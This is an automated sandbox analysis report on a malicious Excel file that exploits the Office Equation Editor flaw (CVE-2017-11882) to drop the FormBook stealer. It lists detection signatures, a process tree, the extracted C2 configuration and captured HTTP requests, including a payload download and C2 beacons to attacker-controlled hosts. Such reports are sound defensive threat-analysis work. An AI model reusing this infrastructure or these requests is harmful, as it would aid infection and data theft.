Analysis Report QTN3C2AF414EDF9_041873.xlsx

Overview

General Information

Sample Name: QTN3C2AF414EDF9_041873.xlsx
Analysis ID: 356571
MD5: 1b862193e621b4d67be94a2ec44fbf50
SHA1: 0bab9195da974524c969404430f6a58b31303322
SHA256: 709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
      • vbc.exe (PID: 2876 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 2952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.vbc.exe.2900000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.2900000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
4.2.vbc.exe.2900000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 54.67.57.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2296, TargetFilename: C:\Users\Public\vbc.exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260

          Signature Overview

AV Detection:

Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack, Malware Configuration Extractor: FormBook
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1], ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: QTN3C2AF414EDF9_041873.xlsx, Virustotal: Detection: 33%
Source: QTN3C2AF414EDF9_041873.xlsx, ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1], Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
Source: 5.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.2900000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A15
Source: C:\Users\Public\vbc.exe, Code function: 4_2_004065C1 FindFirstFileA,FindClose,4_2_004065C1
Source: C:\Users\Public\vbc.exe, Code function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop esi, 5_2_00415843
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx, 5_2_00406A95
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_004162BB
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_00415675
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_1_004162BB
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_1_00415675
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop esi, 5_1_00415843
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx, 5_1_00406A95
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 7_2_000962BB
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 7_2_00095675
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop esi, 7_2_00095843
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop ebx, 7_2_00086A95
Source: global traffic, DNS query: name: ow.ly
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.856380692.xyz/nsag/
Connects to a URL shortener service
Source: unknown, DNS query: name: ow.ly
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 23 Feb 2021 09:26:00 GMT
  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
  Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT
  ETag: "35218-5bbfc3ca9d9e8"
  Accept-Ranges: bytes
  Content-Length: 217624
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected:
  GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1
  Host: www.fashionwatchesstore.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1
  Host: www.athara-kiano.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1
  Host: www.overseaexpert.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, IP Address: 103.140.251.164
Source: Joe Sandbox View, IP Address: 54.67.57.56
Source: Joe Sandbox View, ASN Name: ASDETUKhttpwwwheficedcomGB
Source: global traffic, HTTP traffic detected:
  GET /omCE30rxT5x HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: ow.ly
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: algreenstdykeghestqw.dns.army
Source: C:\Windows\explorer.exe, Code function: 6_2_0293C302 getaddrinfo,setsockopt,recv,6_2_0293C302
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown, DNS traffic detected: queries for: ow.ly
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 23 Feb 2021 09:27:26 GMT
  Server: Apache
  X-XSS-Protection: 1; mode=block
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Content-Length: 203
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
